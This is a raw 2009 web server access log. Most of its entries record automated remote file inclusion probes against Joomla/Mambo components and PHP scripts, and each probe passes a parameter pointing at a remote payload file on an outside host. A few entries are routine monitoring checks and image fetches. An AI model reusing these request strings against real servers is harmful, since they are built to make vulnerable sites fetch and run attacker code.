222.122.142.249 - - [21/Jun/2009:02:28:42 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:28:42 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:28:42 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:28:42 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:02:28:43 -0400] "GET /logs/access_log.Q109061400/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:28:47 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:02:29:03 -0400] "GET /logs/access_log.Q109052900%20%20//includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:29:12 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:29:12 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:29:13 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:29:14 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:29:14 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:29:14 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:29:18 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:29:18 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:29:18 -0400] "GET /logs/access_log.Q109061500%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:02:29:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.17.99.13 - - [21/Jun/2009:02:29:29 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:29:29 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:29:29 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:29:38 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:29:39 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:29:40 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:29:40 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:29:41 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:29:41 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:02:29:42 -0400] "GET /logs/access_log.Q109052900%20%20//includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:29:47 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:29:52 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.44.126.182 - - [21/Jun/2009:02:30:15 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.44.126.182 - - [21/Jun/2009:02:30:26 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:02:30:27 -0400] "GET /logs/access_log.Q109060800%20%20//includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:02:31:37 -0400] "GET /logs/access_log.Q109052900%20%20//includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:02:32:24 -0400] "GET /logs/access_log.Q109051600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 267 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:02:32:40 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://140.124.85.76//appserv/dark.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:02:32:40 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://140.124.85.76//appserv/dark.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:02:32:40 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://140.124.85.76//appserv/dark.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:02:32:44 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://140.124.85.76//appserv/dark.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:02:33:05 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:02:33:05 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:02:33:05 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:34:13 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:34:13 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:34:13 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:02:34:22 -0400] "GET /logs/access_log.Q109060800%20%20//includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:34:25 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:02:34:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.94.80.27 - - [21/Jun/2009:02:34:42 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env[include_prefix]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:02:34:42 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:02:34:42 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:02:34:46 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env[include_prefix]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:02:34:46 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:02:34:46 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.65"
211.202.2.220 - - [21/Jun/2009:02:34:55 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
211.202.2.220 - - [21/Jun/2009:02:34:55 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
211.202.2.220 - - [21/Jun/2009:02:34:55 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
211.202.2.220 - - [21/Jun/2009:02:34:56 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
69.94.80.27 - - [21/Jun/2009:02:35:02 -0400] "GET /logs/access_log.Q109060600//bookmark4u/lostpasswd.php?env[include_prefix]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:02:35:05 -0400] "GET /logs/access_log.Q109060600//bookmark4u/lostpasswd.php?env[include_prefix]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.65"
66.11.230.36 - - [21/Jun/2009:02:35:13 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:02:35:13 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:02:35:13 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:02:35:24 -0400] "GET /logs/access_log.Q109051200/skin/zero_vote/login.php?dir=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.202.2.220 - - [21/Jun/2009:02:35:39 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.149.157.130 - - [21/Jun/2009:02:36:10 -0400] "GET /modules/My_eGallery/index.php?basepath=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:02:36:10 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:02:36:10 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:36:12 -0400] "GET /logs/access_log.Q109060800/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:02:36:14 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:02:37:03 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:02:37:03 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:02:37:03 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
84.97.246.20 - - [21/Jun/2009:02:37:13 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
84.97.246.20 - - [21/Jun/2009:02:37:13 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
84.97.246.20 - - [21/Jun/2009:02:37:16 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
84.97.246.20 - - [21/Jun/2009:02:37:16 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
124.138.156.3 - - [21/Jun/2009:02:37:49 -0400] "GET /logs/access_log.Q109051200//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:02:37:51 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:02:37:58 -0400] "GET /logs/access_log.Q109060800//includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:38:15 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:38:15 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:38:16 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.122.179.44 - - [21/Jun/2009:02:38:31 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.122.179.44 - - [21/Jun/2009:02:38:31 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
222.122.179.44 - - [21/Jun/2009:02:38:31 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.122.179.44 - - [21/Jun/2009:02:38:32 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.122.179.44 - - [21/Jun/2009:02:38:32 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.122.179.44 - - [21/Jun/2009:02:38:32 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
222.122.179.44 - - [21/Jun/2009:02:38:32 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.122.179.44 - - [21/Jun/2009:02:38:36 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:02:39:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.202.2.220 - - [21/Jun/2009:02:40:45 -0400] "GET /logs/access_log.Q108041200//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.149.157.130 - - [21/Jun/2009:02:40:46 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:02:40:46 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:02:41:45 -0400] "GET /logs/access_log.Q109060800//includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
213.189.2.38 - - [21/Jun/2009:02:41:51 -0400] "GET /logs/access_log.Q109050700/index1.php?op=http://www.chfeel.com/chfeel/bbs/id1.txt??%20? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:02:42:26 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:02:44:11 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:02:44:11 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:02:44:11 -0400] "GET /logs/access_log.Q109051300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:02:44:26 -0400] "GET /errors.php?error=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
116.121.201.70 - - [21/Jun/2009:02:44:26 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
116.121.201.70 - - [21/Jun/2009:02:44:26 -0400] "GET /logs/errors.php?error=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
209.59.12.99 - - [21/Jun/2009:02:44:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.217.216.86 - - [21/Jun/2009:02:44:53 -0400] "GET /logs/access_log.Q109052200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.122.179.44 - - [21/Jun/2009:02:45:10 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:02:45:30 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.179.44 - - [21/Jun/2009:02:45:32 -0400] "GET /logs/access_log.Q109052200%20%20/modules/My_eGallery/index.php?basepath=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:02:45:36 -0400] "GET /logs/access_log.Q109050700%20//include/lib.inc.php?site_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:02:45:37 -0400] "GET /logs//include/lib.inc.php?site_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:02:45:37 -0400] "GET //include/lib.inc.php?site_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.826"
66.11.230.36 - - [21/Jun/2009:02:45:43 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:02:45:56 -0400] "GET /logs/access_log.Q109051200//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:02:46:26 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:02:46:46 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
200.142.148.142 - - [21/Jun/2009:02:46:46 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:02:46:46 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:02:47:32 -0400] "GET /logs/access_log.Q109060100%20%20/?dir[plugins]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.64.89.139 - - [21/Jun/2009:02:47:32 -0400] "GET /logs/?dir[plugins]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
